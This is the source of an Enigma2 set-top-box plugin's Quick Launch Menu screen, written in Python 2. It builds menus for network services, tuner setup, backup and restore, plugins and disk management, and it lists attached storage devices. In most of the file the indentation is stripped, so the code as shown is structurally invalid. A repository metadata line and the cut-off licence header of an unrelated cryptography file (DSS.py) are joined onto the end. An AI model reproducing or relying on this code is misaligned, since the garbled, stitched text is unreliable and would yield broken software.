from Plugins.SystemPlugins.Satfinder.plugin import Satfinder
from Plugins.SystemPlugins.NetworkBrowser.MountManager import AutoMountManager
from Plugins.SystemPlugins.NetworkBrowser.NetworkBrowser import NetworkBrowser
from Plugins.SystemPlugins.NetworkWizard.NetworkWizard import NetworkWizard
from Plugins.Extensions.ExtrasPanel.RestartNetwork import RestartNetwork
from Plugins.Extensions.ExtrasPanel.MountManager import HddMount
from Plugins.Extensions.ExtrasPanel.SoftcamPanel import *
from Plugins.Extensions.ExtrasPanel.SoftwarePanel import SoftwarePanel
from Plugins.SystemPlugins.SoftwareManager.Flash_online import FlashOnline
from Plugins.SystemPlugins.SoftwareManager.ImageBackup import ImageBackup
from Plugins.SystemPlugins.SoftwareManager.plugin import UpdatePlugin, SoftwareManagerSetup
from Plugins.SystemPlugins.SoftwareManager.BackupRestore import BackupScreen, RestoreScreen, BackupSelection, getBackupPath, getOldBackupPath, getBackupFilename
from Tools.Directories import resolveFilename, SCOPE_PLUGINS, SCOPE_SKIN_IMAGE, SCOPE_SKIN
from Tools.LoadPixmap import LoadPixmap
from os import path, listdir
from time import sleep
from re import search
import NavigationInstance
plugin_path_networkbrowser = eEnv.resolve("${libdir}/enigma2/python/Plugins/SystemPlugins/NetworkBrowser")
if path.exists("/usr/lib/enigma2/python/Plugins/Extensions/AudioSync"):
from Plugins.Extensions.AudioSync.AC3setup import AC3LipSyncSetup
plugin_path_audiosync = eEnv.resolve("${libdir}/enigma2/python/Plugins/Extensions/AudioSync")
AUDIOSYNC = True
else:
AUDIOSYNC = False
if path.exists("/usr/lib/enigma2/python/Plugins/SystemPlugins/VideoEnhancement/plugin.pyo"):
from Plugins.SystemPlugins.VideoEnhancement.plugin import VideoEnhancementSetup
VIDEOENH = True
else:
VIDEOENH = False
if path.exists("/usr/lib/enigma2/python/Plugins/Extensions/dFlash"):
from Plugins.Extensions.dFlash.plugin import dFlash
DFLASH = True
else:
DFLASH = False
if path.exists("/usr/lib/enigma2/python/Plugins/SystemPlugins/PositionerSetup/plugin.pyo"):
from Plugins.SystemPlugins.PositionerSetup.plugin import PositionerSetup, RotorNimSelection
POSSETUP = True
else:
POSSETUP = False
def isFileSystemSupported(filesystem):
try:
for fs in open('/proc/filesystems', 'r'):
if fs.strip().endswith(filesystem):
return True
return False
except Exception, ex:
print "[Harddisk] Failed to read /proc/filesystems:", ex
def Check_Softcam():
found = False
for x in listdir('/etc'):
if x.find('.emu') > -1:
found = True
			break
return found
class QuickMenu(Screen):
skin = """
<screen name="QuickMenu" position="center,center" size="1180,600" backgroundColor="black" flags="wfBorder">
<widget name="list" position="21,32" size="370,400" backgroundColor="black" itemHeight="50" transparent="1" />
<widget name="sublist" position="410,32" size="300,400" backgroundColor="black" itemHeight="50" />
<eLabel position="400,30" size="2,400" backgroundColor="darkgrey" zPosition="3" />
<widget source="session.VideoPicture" render="Pig" position="720,30" size="450,300" backgroundColor="transparent" zPosition="1" />
<widget name="description" position="22,445" size="1150,110" zPosition="1" font="Regular;22" halign="center" backgroundColor="black" transparent="1" />
<widget name="key_red" position="20,571" size="300,26" zPosition="1" font="Regular;22" halign="center" foregroundColor="white" backgroundColor="black" transparent="1" />
<widget name="key_green" position="325,571" size="300,26" zPosition="1" font="Regular;22" halign="center" foregroundColor="white" backgroundColor="black" transparent="1" />
<widget name="key_yellow" position="630,571" size="300,26" zPosition="1" font="Regular;22" halign="center" foregroundColor="white" backgroundColor="black" transparent="1" valign="center" />
<widget name="key_blue" position="935,571" size="234,26" zPosition="1" font="Regular;22" halign="center" foregroundColor="white" backgroundColor="black" transparent="1" />
<eLabel name="new eLabel" position="21,567" size="300,3" zPosition="3" backgroundColor="red" />
<eLabel name="new eLabel" position="325,567" size="300,3" zPosition="3" backgroundColor="green" />
<eLabel name="new eLabel" position="630,567" size="300,3" zPosition="3" backgroundColor="yellow" />
<eLabel name="new eLabel" position="935,567" size="234,3" zPosition="3" backgroundColor="blue" />
</screen> """
def __init__(self, session):
Screen.__init__(self, session)
Screen.setTitle(self, _("Quick Launch Menu"))
self["key_red"] = Label(_("Exit"))
self["key_green"] = Label(_("System Info"))
self["key_yellow"] = Label(_("Devices"))
self["key_blue"] = Label()
self["description"] = Label()
self.menu = 0
self.list = []
self["list"] = QuickMenuList(self.list)
self.sublist = []
self["sublist"] = QuickMenuSubList(self.sublist)
self.selectedList = []
self.onChangedEntry = []
self["list"].onSelectionChanged.append(self.selectionChanged)
self["sublist"].onSelectionChanged.append(self.selectionSubChanged)
self["actions"] = ActionMap(["SetupActions","WizardActions","MenuActions","MoviePlayerActions"],
{
"ok": self.ok,
"back": self.keyred,
"cancel": self.keyred,
"left": self.goLeft,
"right": self.goRight,
"up": self.goUp,
"down": self.goDown,
}, -1)
self["ColorActions"] = HelpableActionMap(self, "ColorActions",
{
"red": self.keyred,
"green": self.keygreen,
"yellow": self.keyyellow,
})
self.MainQmenu()
self.selectedList = self["list"]
self.selectionChanged()
self.onLayoutFinish.append(self.layoutFinished)
def layoutFinished(self):
self["sublist"].selectionEnabled(0)
def selectionChanged(self):
if self.selectedList == self["list"]:
item = self["list"].getCurrent()
if item:
self["description"].setText(_(item[4]))
self.okList()
def selectionSubChanged(self):
if self.selectedList == self["sublist"]:
item = self["sublist"].getCurrent()
if item:
self["description"].setText(_(item[3]))
def goLeft(self):
		if self.menu != 0:
self.menu = 0
self.selectedList = self["list"]
self["list"].selectionEnabled(1)
self["sublist"].selectionEnabled(0)
self.selectionChanged()
def goRight(self):
if self.menu == 0:
self.menu = 1
self.selectedList = self["sublist"]
self["sublist"].moveToIndex(0)
self["list"].selectionEnabled(0)
self["sublist"].selectionEnabled(1)
self.selectionSubChanged()
def goUp(self):
self.selectedList.up()
def goDown(self):
self.selectedList.down()
def keyred(self):
self.close()
def keygreen(self):
self.session.open(About)
def keyyellow(self):
self.session.open(QuickMenuDevices)
######## Main Menu ##############################
def MainQmenu(self):
self.menu = 0
self.list = []
self.oldlist = []
self.list.append(QuickMenuEntryComponent("Software Manager",_("Update/Backup/Restore your box"),_("Update/Backup your firmware, Backup/Restore settings")))
if Check_Softcam():
self.list.append(QuickMenuEntryComponent("Softcam",_("Start/stop/select cam"),_("Start/stop/select your cam, You need to install first a softcam")))
self.list.append(QuickMenuEntryComponent("System",_("System Setup"),_("Setup your System")))
self.list.append(QuickMenuEntryComponent("Mounts",_("Mount Setup"),_("Setup your mounts for network")))
self.list.append(QuickMenuEntryComponent("Network",_("Setup your local network"),_("Setup your local network. For Wlan you need to boot with a USB-Wlan stick")))
self.list.append(QuickMenuEntryComponent("AV Setup",_("Setup Videomode"),_("Setup your Video Mode, Video Output and other Video Settings")))
self.list.append(QuickMenuEntryComponent("Tuner Setup",_("Setup Tuner"),_("Setup your Tuner and search for channels")))
self.list.append(QuickMenuEntryComponent("Plugins",_("Download plugins"),_("Shows available pluigns. Here you can download and install them")))
self.list.append(QuickMenuEntryComponent("Harddisk",_("Harddisk Setup"),_("Setup your Harddisk")))
self["list"].l.setList(self.list)
######## System Setup Menu ##############################
def Qsystem(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Customise",_("Setup Enigma2"),_("Customise enigma2 personal settings")))
self.sublist.append(QuickSubMenuEntryComponent("OSD settings",_("Settings..."),_("Setup your OSD")))
self.sublist.append(QuickSubMenuEntryComponent("Button Setup",_("Button Setup"),_("Setup your remote buttons")))
if SystemInfo["FrontpanelDisplay"] and SystemInfo["Display"]:
self.sublist.append(QuickSubMenuEntryComponent("Display Settings",_("Display Setup"),_("Setup your display")))
if SystemInfo["LcdDisplay"]:
self.sublist.append(QuickSubMenuEntryComponent("LCD Skin Setup",_("Skin Setup"),_("Setup your LCD")))
self.sublist.append(QuickSubMenuEntryComponent("Channel selection",_("Channel selection configuration"),_("Setup your Channel selection configuration")))
self.sublist.append(QuickSubMenuEntryComponent("Recording settings",_("Recording Setup"),_("Setup your recording config")))
self.sublist.append(QuickSubMenuEntryComponent("EPG settings",_("EPG Setup"),_("Setup your EPG config")))
self["sublist"].l.setList(self.sublist)
######## Network Menu ##############################
def Qnetwork(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Network Wizard",_("Configure your Network"),_("Use the Networkwizard to configure your Network. The wizard will help you to setup your network")))
		if len(self.adapters) > 1: # show adapter selection only if more than one adapter is installed
			self.sublist.append(QuickSubMenuEntryComponent("Network Adapter Selection",_("Select Lan/Wlan"),_("Setup your network interface. If no Wlan stick is used, you can only select Lan")))
		if not self.activeInterface == None: # show only if an adapter is already up
			self.sublist.append(QuickSubMenuEntryComponent("Network Interface",_("Setup interface"),_("Setup network. Here you can setup DHCP, IP, DNS")))
		self.sublist.append(QuickSubMenuEntryComponent("Network Restart",_("Restart network with current setup"),_("Restart network and remount connections")))
self.sublist.append(QuickSubMenuEntryComponent("Network Services",_("Setup Network Services"),_("Setup Network Services (Samba, Ftp, NFS, ...)")))
self["sublist"].l.setList(self.sublist)
#### Network Services Menu ##############################
def Qnetworkservices(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Samba",_("Setup Samba"),_("Setup Samba")))
self.sublist.append(QuickSubMenuEntryComponent("NFS",_("Setup NFS"),_("Setup NFS")))
self.sublist.append(QuickSubMenuEntryComponent("FTP",_("Setup FTP"),_("Setup FTP")))
self.sublist.append(QuickSubMenuEntryComponent("AFP",_("Setup AFP"),_("Setup AFP")))
self.sublist.append(QuickSubMenuEntryComponent("OpenVPN",_("Setup OpenVPN"),_("Setup OpenVPN")))
self.sublist.append(QuickSubMenuEntryComponent("MiniDLNA",_("Setup MiniDLNA"),_("Setup MiniDLNA")))
self.sublist.append(QuickSubMenuEntryComponent("Inadyn",_("Setup Inadyn"),_("Setup Inadyn")))
self.sublist.append(QuickSubMenuEntryComponent("SABnzbd",_("Setup SABnzbd"),_("Setup SABnzbd")))
self.sublist.append(QuickSubMenuEntryComponent("uShare",_("Setup uShare"),_("Setup uShare")))
self.sublist.append(QuickSubMenuEntryComponent("Telnet",_("Setup Telnet"),_("Setup Telnet")))
self["sublist"].l.setList(self.sublist)
######## Mount Settings Menu ##############################
def Qmount(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Mount Manager",_("Manage network mounts"),_("Setup your network mounts")))
self.sublist.append(QuickSubMenuEntryComponent("Network Browser",_("Search for network shares"),_("Search for network shares")))
self.sublist.append(QuickSubMenuEntryComponent("Device Manager",_("Mounts Devices"),_("Setup your Device mounts (USB, HDD, others...)")))
self["sublist"].l.setList(self.sublist)
######## Softcam Menu ##############################
def Qsoftcam(self):
self.sublist = []
if Check_Softcam(): # show only when there is a softcam installed
self.sublist.append(QuickSubMenuEntryComponent("Softcam Panel",_("Control your Softcams"),_("Use the Softcam Panel to control your Cam. This let you start/stop/select a cam")))
self.sublist.append(QuickSubMenuEntryComponent("Download Softcams",_("Download and install cam"),_("Shows available softcams. Here you can download and install them")))
self["sublist"].l.setList(self.sublist)
######## A/V Settings Menu ##############################
def Qavsetup(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("AV Settings",_("Setup Videomode"),_("Setup your Video Mode, Video Output and other Video Settings")))
if AUDIOSYNC == True:
self.sublist.append(QuickSubMenuEntryComponent("Audio Sync",_("Setup Audio Sync"),_("Setup Audio Sync settings")))
self.sublist.append(QuickSubMenuEntryComponent("Auto Language",_("Auto Language Selection"),_("Select your Language for Audio/Subtitles")))
		if path.exists("/proc/stb/vmpeg/0/pep_apply") and VIDEOENH == True:
self.sublist.append(QuickSubMenuEntryComponent("VideoEnhancement",_("VideoEnhancement Setup"),_("VideoEnhancement Setup")))
self["sublist"].l.setList(self.sublist)
######## Tuner Menu ##############################
def Qtuner(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Tuner Configuration",_("Setup tuner(s)"),_("Setup each tuner for your satellite system")))
if POSSETUP == True:
self.sublist.append(QuickSubMenuEntryComponent("Positioner Setup",_("Setup rotor"),_("Setup your positioner for your satellite system")))
self.sublist.append(QuickSubMenuEntryComponent("Automatic Scan",_("Service Searching"),_("Automatic scan for services")))
self.sublist.append(QuickSubMenuEntryComponent("Manual Scan",_("Service Searching"),_("Manual scan for services")))
self.sublist.append(QuickSubMenuEntryComponent("Sat Finder",_("Search Sats"),_("Search Sats, check signal and lock")))
self["sublist"].l.setList(self.sublist)
######## Software Manager Menu ##############################
def Qsoftware(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Software Update",_("Online software update"),_("Check/Install online updates (you must have a working internet connection)")))
if not getBoxType().startswith('az') and not getBoxType().startswith('dream') and not getBoxType().startswith('ebox'):
self.sublist.append(QuickSubMenuEntryComponent("Flash Online",_("Flash Online a new image"),_("Flash on the fly your your Receiver software.")))
self.sublist.append(QuickSubMenuEntryComponent("Complete Backup",_("Backup your current image"),_("Backup your current image to HDD or USB. This will make a 1:1 copy of your box")))
self.sublist.append(QuickSubMenuEntryComponent("Backup Settings",_("Backup your current settings"),_("Backup your current settings. This includes E2-setup, channels, network and all selected files")))
self.sublist.append(QuickSubMenuEntryComponent("Restore Settings",_("Restore settings from a backup"),_("Restore your settings back from a backup. After restore the box will restart to activated the new settings")))
self.sublist.append(QuickSubMenuEntryComponent("Select Backup files",_("Choose the files to backup"),_("Here you can select which files should be added to backupfile. (default: E2-setup, channels, network")))
self.sublist.append(QuickSubMenuEntryComponent("Software Manager Setup",_("Manage your online update files"),_("Here you can select which files should be updated with a online update")))
self["sublist"].l.setList(self.sublist)
######## Plugins Menu ##############################
def Qplugin(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Plugin Browser",_("Open the Plugin Browser"),_("Shows Plugins Browser. Here you can setup installed Plugin")))
self.sublist.append(QuickSubMenuEntryComponent("Download Plugins",_("Download and install Plugins"),_("Shows available plugins. Here you can download and install them")))
self.sublist.append(QuickSubMenuEntryComponent("Remove Plugins",_("Delete Plugins"),_("Delete and unstall Plugins. This will remove the Plugin from your box")))
self.sublist.append(QuickSubMenuEntryComponent("Plugin Filter",_("Setup Plugin filter"),_("Setup Plugin filter. Here you can select which Plugins are showed in the PluginBrowser")))
self.sublist.append(QuickSubMenuEntryComponent("IPK Installer",_("Install local extension"),_("Scan for local extensions and install them")))
self["sublist"].l.setList(self.sublist)
######## Harddisk Menu ##############################
def Qharddisk(self):
self.sublist = []
self.sublist.append(QuickSubMenuEntryComponent("Harddisk Setup",_("Harddisk Setup"),_("Setup your Harddisk")))
self.sublist.append(QuickSubMenuEntryComponent("Initialization",_("Format HDD"),_("Format your Harddisk")))
self.sublist.append(QuickSubMenuEntryComponent("Filesystem Check",_("Check HDD"),_("Filesystem check your Harddisk")))
if isFileSystemSupported("ext4"):
self.sublist.append(QuickSubMenuEntryComponent("Convert ext3 to ext4",_("Convert filesystem ext3 to ext4"),_("Convert filesystem ext3 to ext4")))
self["sublist"].l.setList(self.sublist)
def ok(self):
if self.menu > 0:
self.okSubList()
else:
self.goRight()
#####################################################################
######## Make Selection MAIN MENU LIST ##############################
#####################################################################
def okList(self):
item = self["list"].getCurrent()
######## Select Network Menu ##############################
if item[0] == _("Network"):
self.GetNetworkInterfaces()
self.Qnetwork()
######## Select System Setup Menu ##############################
elif item[0] == _("System"):
self.Qsystem()
######## Select Mount Menu ##############################
elif item[0] == _("Mounts"):
self.Qmount()
######## Select Softcam Menu ##############################
elif item[0] == _("Softcam"):
self.Qsoftcam()
######## Select AV Setup Menu ##############################
elif item[0] == _("AV Setup"):
self.Qavsetup()
######## Select Tuner Setup Menu ##############################
elif item[0] == _("Tuner Setup"):
self.Qtuner()
######## Select Software Manager Menu ##############################
elif item[0] == _("Software Manager"):
self.Qsoftware()
######## Select PluginDownloadBrowser Menu ##############################
elif item[0] == _("Plugins"):
self.Qplugin()
		######## Select Harddisk Menu ##############################
elif item[0] == _("Harddisk"):
self.Qharddisk()
self["sublist"].selectionEnabled(0)
#####################################################################
######## Make Selection SUB MENU LIST ##############################
#####################################################################
def okSubList(self):
item = self["sublist"].getCurrent()
######## Select Network Menu ##############################
if item[0] == _("Network Wizard"):
self.session.open(NetworkWizard)
elif item[0] == _("Network Adapter Selection"):
self.session.open(NetworkAdapterSelection)
elif item[0] == _("Network Interface"):
self.session.open(AdapterSetup,self.activeInterface)
elif item[0] == _("Network Restart"):
self.session.open(RestartNetwork)
elif item[0] == _("Network Services"):
self.Qnetworkservices()
self["sublist"].moveToIndex(0)
elif item[0] == _("Samba"):
self.session.open(NetworkSamba)
elif item[0] == _("NFS"):
self.session.open(NetworkNfs)
elif item[0] == _("FTP"):
self.session.open(NetworkFtp)
elif item[0] == _("AFP"):
self.session.open(NetworkAfp)
elif item[0] == _("OpenVPN"):
self.session.open(NetworkOpenvpn)
elif item[0] == _("MiniDLNA"):
self.session.open(NetworkMiniDLNA)
elif item[0] == _("Inadyn"):
self.session.open(NetworkInadyn)
elif item[0] == _("SABnzbd"):
self.session.open(NetworkSABnzbd)
elif item[0] == _("uShare"):
self.session.open(NetworkuShare)
elif item[0] == _("Telnet"):
self.session.open(NetworkTelnet)
######## Select System Setup Menu ##############################
elif item[0] == _("Customise"):
self.openSetup("usage")
elif item[0] == _("Button Setup"):
self.openSetup("remotesetup")
elif item[0] == _("Display Settings"):
self.openSetup("display")
elif item[0] == _("LCD Skin Setup"):
self.session.open(LcdSkinSelector)
elif item[0] == _("OSD settings"):
self.openSetup("userinterface")
elif item[0] == _("Channel selection"):
self.openSetup("channelselection")
elif item[0] == _("Recording settings"):
self.openSetup("recording")
elif item[0] == _("EPG settings"):
self.openSetup("epgsettings")
######## Select Mounts Menu ##############################
elif item[0] == _("Mount Manager"):
self.session.open(AutoMountManager, None, plugin_path_networkbrowser)
elif item[0] == _("Network Browser"):
self.session.open(NetworkBrowser, None, plugin_path_networkbrowser)
elif item[0] == _("Device Manager"):
self.session.open(HddMount)
######## Select Softcam Menu ##############################
elif item[0] == _("Softcam Panel"):
self.session.open(SoftcamPanel)
elif item[0] == _("Download Softcams"):
self.session.open(ShowSoftcamPackages)
######## Select AV Setup Menu ##############################
elif item[0] == _("AV Settings"):
self.session.open(VideoSetup)
elif item[0] == _("Auto Language"):
self.openSetup("autolanguagesetup")
elif item[0] == _("Audio Sync"):
self.session.open(AC3LipSyncSetup, plugin_path_audiosync)
elif item[0] == _("VideoEnhancement"):
self.session.open(VideoEnhancementSetup)
######## Select TUNER Setup Menu ##############################
elif item[0] == _("Tuner Configuration"):
self.session.open(NimSelection)
elif item[0] == _("Positioner Setup"):
self.PositionerMain()
elif item[0] == _("Automatic Scan"):
self.session.open(ScanSimple)
elif item[0] == _("Manual Scan"):
self.session.open(ScanSetup)
elif item[0] == _("Sat Finder"):
self.SatfinderMain()
######## Select Software Manager Menu ##############################
elif item[0] == _("Software Update"):
self.session.open(SoftwarePanel)
elif item[0] == _("Flash Online"):
self.session.open(FlashOnline)
elif item[0] == _("Complete Backup"):
if DFLASH == True:
self.session.open(dFlash)
else:
self.session.open(ImageBackup)
elif item[0] == _("Backup Settings"):
self.session.openWithCallback(self.backupDone,BackupScreen, runBackup = True)
elif item[0] == _("Restore Settings"):
self.backuppath = getBackupPath()
if not path.isdir(self.backuppath):
self.backuppath = getOldBackupPath()
self.backupfile = getBackupFilename()
self.fullbackupfilename = self.backuppath + "/" + self.backupfile
if os_path.exists(self.fullbackupfilename):
self.session.openWithCallback(self.startRestore, MessageBox, _("Are you sure you want to restore your %s %s backup?\nSTB will restart after the restore") % (getMachineBrand(), getMachineName()))
else:
self.session.open(MessageBox, _("Sorry no backups found!"), MessageBox.TYPE_INFO, timeout = 10)
elif item[0] == _("Select Backup files"):
self.session.openWithCallback(self.backupfiles_choosen,BackupSelection)
elif item[0] == _("Software Manager Setup"):
self.session.open(SoftwareManagerSetup)
######## Select PluginDownloadBrowser Menu ##############################
elif item[0] == _("Plugin Browser"):
self.session.open(PluginBrowser)
elif item[0] == _("Download Plugins"):
self.session.open(PluginDownloadBrowser, 0)
elif item[0] == _("Remove Plugins"):
self.session.open(PluginDownloadBrowser, 1)
elif item[0] == _("Plugin Filter"):
self.session.open(PluginFilter)
elif item[0] == _("IPK Installer"):
try:
from Plugins.Extensions.MediaScanner.plugin import main
main(self.session)
			except ImportError:
				self.session.open(MessageBox, _("Sorry, MediaScanner is not installed!"), MessageBox.TYPE_INFO, timeout = 10)
######## Select Harddisk Menu ############################################
elif item[0] == _("Harddisk Setup"):
self.openSetup("harddisk")
elif item[0] == _("Initialization"):
self.session.open(HarddiskSelection)
elif item[0] == _("Filesystem Check"):
self.session.open(HarddiskFsckSelection)
elif item[0] == _("Convert ext3 to ext4"):
self.session.open(HarddiskConvertExt4Selection)
######## OPEN SETUP MENUS ####################
def openSetup(self, dialog):
self.session.openWithCallback(self.menuClosed, Setup, dialog)
def menuClosed(self, *res):
pass
######## NETWORK TOOLS #######################
def GetNetworkInterfaces(self):
self.adapters = [(iNetwork.getFriendlyAdapterName(x),x) for x in iNetwork.getAdapterList()]
if not self.adapters:
self.adapters = [(iNetwork.getFriendlyAdapterName(x),x) for x in iNetwork.getConfiguredAdapters()]
if len(self.adapters) == 0:
self.adapters = [(iNetwork.getFriendlyAdapterName(x),x) for x in iNetwork.getInstalledAdapters()]
self.activeInterface = None
for x in self.adapters:
if iNetwork.getAdapterAttribute(x[1], 'up') is True:
self.activeInterface = x[1]
return
######## TUNER TOOLS #######################
def PositionerMain(self):
nimList = nimmanager.getNimListOfType("DVB-S")
if len(nimList) == 0:
self.session.open(MessageBox, _("No positioner capable frontend found."), MessageBox.TYPE_ERROR)
else:
if len(NavigationInstance.instance.getRecordings()) > 0:
self.session.open(MessageBox, _("A recording is currently running. Please stop the recording before trying to configure the positioner."), MessageBox.TYPE_ERROR)
else:
usableNims = []
for x in nimList:
configured_rotor_sats = nimmanager.getRotorSatListForNim(x)
if len(configured_rotor_sats) != 0:
usableNims.append(x)
if len(usableNims) == 1:
self.session.open(PositionerSetup, usableNims[0])
elif len(usableNims) > 1:
self.session.open(RotorNimSelection)
else:
self.session.open(MessageBox, _("No tuner is configured for use with a diseqc positioner!"), MessageBox.TYPE_ERROR)
def SatfinderMain(self):
nims = nimmanager.getNimListOfType("DVB-S")
nimList = []
for x in nims:
if not nimmanager.getNimConfig(x).configMode.getValue() in ("loopthrough", "satposdepends", "nothing"):
nimList.append(x)
if len(nimList) == 0:
self.session.open(MessageBox, _("No satellite frontend found!!"), MessageBox.TYPE_ERROR)
else:
if len(NavigationInstance.instance.getRecordings()) > 0:
self.session.open(MessageBox, _("A recording is currently running. Please stop the recording before trying to start the satfinder."), MessageBox.TYPE_ERROR)
else:
self.session.open(Satfinder)
######## SOFTWARE MANAGER TOOLS #######################
def backupfiles_choosen(self, ret):
config.plugins.configurationbackup.backupdirs.save()
config.plugins.configurationbackup.save()
config.save()
def backupDone(self,retval = None):
if retval is True:
self.session.open(MessageBox, _("Backup done."), MessageBox.TYPE_INFO, timeout = 10)
else:
self.session.open(MessageBox, _("Backup failed."), MessageBox.TYPE_INFO, timeout = 10)
def startRestore(self, ret = False):
if (ret == True):
self.exe = True
self.session.open(RestoreScreen, runRestore = True)
######## Create MENULIST format #######################
def QuickMenuEntryComponent(name, description, long_description = None, width=540):
pngname = name.replace(" ","_")
png = LoadPixmap("/usr/lib/enigma2/python/Plugins/Extensions/ExtrasPanel/icons/" + pngname + ".png")
if png is None:
png = LoadPixmap("/usr/lib/enigma2/python/Plugins/Extensions/ExtrasPanel/icons/default.png")
return [
_(name),
MultiContentEntryText(pos=(120, 5), size=(width-120, 25), font=0, text = _(name)),
MultiContentEntryText(pos=(120, 26), size=(width-120, 17), font=1, text = _(description)),
MultiContentEntryPixmapAlphaTest(pos=(10, 5), size=(100, 40), png = png),
_(long_description),
]
def QuickSubMenuEntryComponent(name, description, long_description = None, width=540):
return [
_(name),
MultiContentEntryText(pos=(10, 5), size=(width-10, 25), font=0, text = _(name)),
MultiContentEntryText(pos=(10, 26), size=(width-10, 17), font=1, text = _(description)),
_(long_description),
]
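# Illustrative sketch (not part of the original plugin): each entry built by
# the two helpers above is a MultiContent row whose first element is the
# translated name; okList()/okSubList() dispatch on that element, e.g.:
#
#     entry = QuickSubMenuEntryComponent("Samba", _("Setup Samba"),
#                                        _("Setup Samba file sharing"))
#     entry[0] == _("Samba")  # the key matched by okSubList()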
class QuickMenuList(MenuList):
def __init__(self, list, enableWrapAround=True):
MenuList.__init__(self, list, enableWrapAround, eListboxPythonMultiContent)
self.l.setFont(0, gFont("Regular", 20))
self.l.setFont(1, gFont("Regular", 14))
self.l.setItemHeight(50)
class QuickMenuSubList(MenuList):
def __init__(self, sublist, enableWrapAround=True):
MenuList.__init__(self, sublist, enableWrapAround, eListboxPythonMultiContent)
self.l.setFont(0, gFont("Regular", 20))
self.l.setFont(1, gFont("Regular", 14))
self.l.setItemHeight(50)
class QuickMenuDevices(Screen):
skin = """
<screen name="QuickMenuDevices" position="center,center" size="840,525" title="Devices" flags="wfBorder">
<widget source="devicelist" render="Listbox" position="30,46" size="780,450" font="Regular;16" scrollbarMode="showOnDemand" transparent="1" backgroundColorSelected="grey" foregroundColorSelected="black">
<convert type="TemplatedMultiContent">
{"template": [
MultiContentEntryText(pos = (90, 0), size = (600, 30), font=0, text = 0),
MultiContentEntryText(pos = (110, 30), size = (600, 50), font=1, flags = RT_VALIGN_TOP, text = 1),
MultiContentEntryPixmapAlphaBlend(pos = (0, 0), size = (80, 80), png = 2),
],
"fonts": [gFont("Regular", 24),gFont("Regular", 20)],
"itemHeight": 85
}
</convert>
</widget>
<widget name="lab1" zPosition="2" position="126,92" size="600,40" font="Regular;22" halign="center" backgroundColor="black" transparent="1" />
</screen> """
def __init__(self, session):
Screen.__init__(self, session)
Screen.setTitle(self, _("Devices"))
self['lab1'] = Label()
self.devicelist = []
self['devicelist'] = List(self.devicelist)
self['actions'] = ActionMap(['WizardActions'],
{
'back': self.close,
})
self.activityTimer = eTimer()
self.activityTimer.timeout.get().append(self.updateList2)
self.updateList()
def updateList(self, result = None, retval = None, extra_args = None):
scanning = _("Wait please while scanning for devices...")
self['lab1'].setText(scanning)
self.activityTimer.start(10)
def updateList2(self):
self.activityTimer.stop()
self.devicelist = []
list2 = []
f = open('/proc/partitions', 'r')
for line in f.readlines():
parts = line.strip().split()
if not parts:
continue
device = parts[3]
if not search('sd[a-z][1-9]',device):
continue
if device in list2:
continue
self.buildMy_rec(device)
list2.append(device)
f.close()
self['devicelist'].list = self.devicelist
if len(self.devicelist) == 0:
self['lab1'].setText(_("No Devices Found !!"))
else:
self['lab1'].hide()
	def buildMy_rec(self, device):
		# Strip the partition number to get the parent disk device
		# (e.g. 'sda1' -> 'sda'). The previous chain of try/except blocks
		# handled only partition numbers 1-4 and could leave device2
		# undefined for other partitions.
		device2 = device.rstrip('0123456789')
devicetype = path.realpath('/sys/block/' + device2 + '/device')
d2 = device
name = 'USB: '
mypixmap = '/usr/lib/enigma2/python/Plugins/Extensions/ExtrasPanel/icons/dev_usbstick.png'
		model = open('/sys/block/' + device2 + '/device/model').read()
model = str(model).replace('\n', '')
des = ''
if devicetype.find('/devices/pci') != -1:
name = _("HARD DISK: ")
mypixmap = '/usr/lib/enigma2/python/Plugins/Extensions/ExtrasPanel/icons/dev_hdd.png'
name = name + model
from Components.Console import Console
self.Console = Console()
self.Console.ePopen("sfdisk -l /dev/sd? | grep swap | awk '{print $(NF-9)}' >/tmp/devices.tmp")
sleep(0.5)
f = open('/tmp/devices.tmp', 'r')
swapdevices = f.read()
f.close()
swapdevices = swapdevices.replace('\n','')
swapdevices = swapdevices.split('/')
		f = open('/proc/mounts', 'r')
		for line in f.readlines():
			if line.find(device) != -1:
				parts = line.strip().split()
				d1 = parts[1]
				dtype = parts[2]
				rw = parts[3]
				break
			elif device in swapdevices:
				d1 = _("None")
				dtype = 'swap'
				rw = _("None")
				break
			else:
				d1 = _("None")
				dtype = _("unavailable")
				rw = _("None")
		f.close()
f = open('/proc/partitions', 'r')
for line in f.readlines():
if line.find(device) != -1:
parts = line.strip().split()
size = int(parts[2])
if ((size / 1024) / 1024) > 1:
des = _("Size: ") + str((size / 1024) / 1024) + _("GB")
else:
des = _("Size: ") + str(size / 1024) + _("MB")
else:
try:
					size = open('/sys/block/' + device2 + '/' + device + '/size').read()
size = str(size).replace('\n', '')
size = int(size)
except:
size = 0
if (((size / 2) / 1024) / 1024) > 1:
des = _("Size: ") + str(((size / 2) / 1024) / 1024) + _("GB")
else:
des = _("Size: ") + str((size / 2) / 1024) + _("MB")
f.close()
if des != '':
if rw.startswith('rw'):
rw = ' R/W'
elif rw.startswith('ro'):
rw = ' R/O'
else:
rw = ""
des += '\t' + _("Mount: ") + d1 + '\n' + _("Device: ") + ' /dev/' + device + '\t' + _("Type: ") + dtype + rw
png = LoadPixmap(mypixmap)
res = (name, des, png)
self.devicelist.append(res)
| XTAv2/Enigma2 | lib/python/Plugins/Extensions/ExtrasPanel/QuickMenu.py | Python | gpl-2.0 | 35,097 |
#
# Signature/DSS.py : DSS.py
#
# ===================================================================
#
# Copyright (c) 2014, Legrandin <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
